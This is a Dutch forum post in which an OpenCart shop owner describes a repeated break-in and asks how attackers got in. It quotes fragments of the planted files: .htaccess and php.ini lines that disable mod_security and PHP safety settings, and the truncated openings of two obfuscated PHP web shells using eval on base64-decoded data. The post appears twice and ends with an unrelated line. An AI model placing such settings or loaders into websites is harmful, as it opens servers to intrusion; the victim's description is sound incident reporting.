Ik zag laatst op m'n ftp opeens rare bestanden en kon niet meer in de admin inloggen. Toen zag ik dus dat ik gehacked was. Heb alles verwijderd en hersteld en m'n wachtwoord op ftp veranderd, maar nu is hetzelfde weer gebeurd en is een map met plaatjes verwijderd. Ik heb geen idee hoe ze nou kunnen inbreken?
De bestanden waren onder andere:
.htaccess
<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>
php.ini
safe_mode=OFF
disable_functions=NONE
dark.php
<?php
$auth_pass = "4fa21546ef0bd284ae6b597acf40ed74";
$default_charset = 'windows-1250'; // Do wyboru: 'utf-8', 'windows-1250', 'windows-1251', 'iso-8859-1', 'iso-8859-2'
$color = "#6EB500"; // Kolor: Zielony
$default_use_ajax = true; // Używanie AJAX'a TAK - true, NIE - false
eval(base64_decode
wp-tag.php
<?php
/*
Private x0rg Web Hosting Bypass (phpshell)
*/
eval("?>".gzuncompress(base64_decode
etc. etc. het is dus wel vrij duidelijk wat er gebeurt op zich...(script zelf is gecodeerd) maar ik snap niet hoe ze zit kunnen doen? Wat kan ik nou doen om dit tegen te gaan? De website gebruikt OpenCart, zit er daar een bug of iets in? Verder staan sommige mappen op 755 rechten, maar dat moet anders werkt het niet.
De webhost zegt dat er niet is ingelogd op de datum dat deze bestanden waren aangemaakt.
De bestanden waren onder andere:
.htaccess
<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>
php.ini
safe_mode=OFF
disable_functions=NONE
dark.php
<?php
$auth_pass = "4fa21546ef0bd284ae6b597acf40ed74";
$default_charset = 'windows-1250'; // Do wyboru: 'utf-8', 'windows-1250', 'windows-1251', 'iso-8859-1', 'iso-8859-2'
$color = "#6EB500"; // Kolor: Zielony
$default_use_ajax = true; // Używanie AJAX'a TAK - true, NIE - false
eval(base64_decode
wp-tag.php
<?php
/*
Private x0rg Web Hosting Bypass (phpshell)
*/
eval("?>".gzuncompress(base64_decode
etc. etc. het is dus wel vrij duidelijk wat er gebeurt op zich...(script zelf is gecodeerd) maar ik snap niet hoe ze zit kunnen doen? Wat kan ik nou doen om dit tegen te gaan? De website gebruikt OpenCart, zit er daar een bug of iets in? Verder staan sommige mappen op 755 rechten, maar dat moet anders werkt het niet.
De webhost zegt dat er niet is ingelogd op de datum dat deze bestanden waren aangemaakt.
Facts don't care about your feelings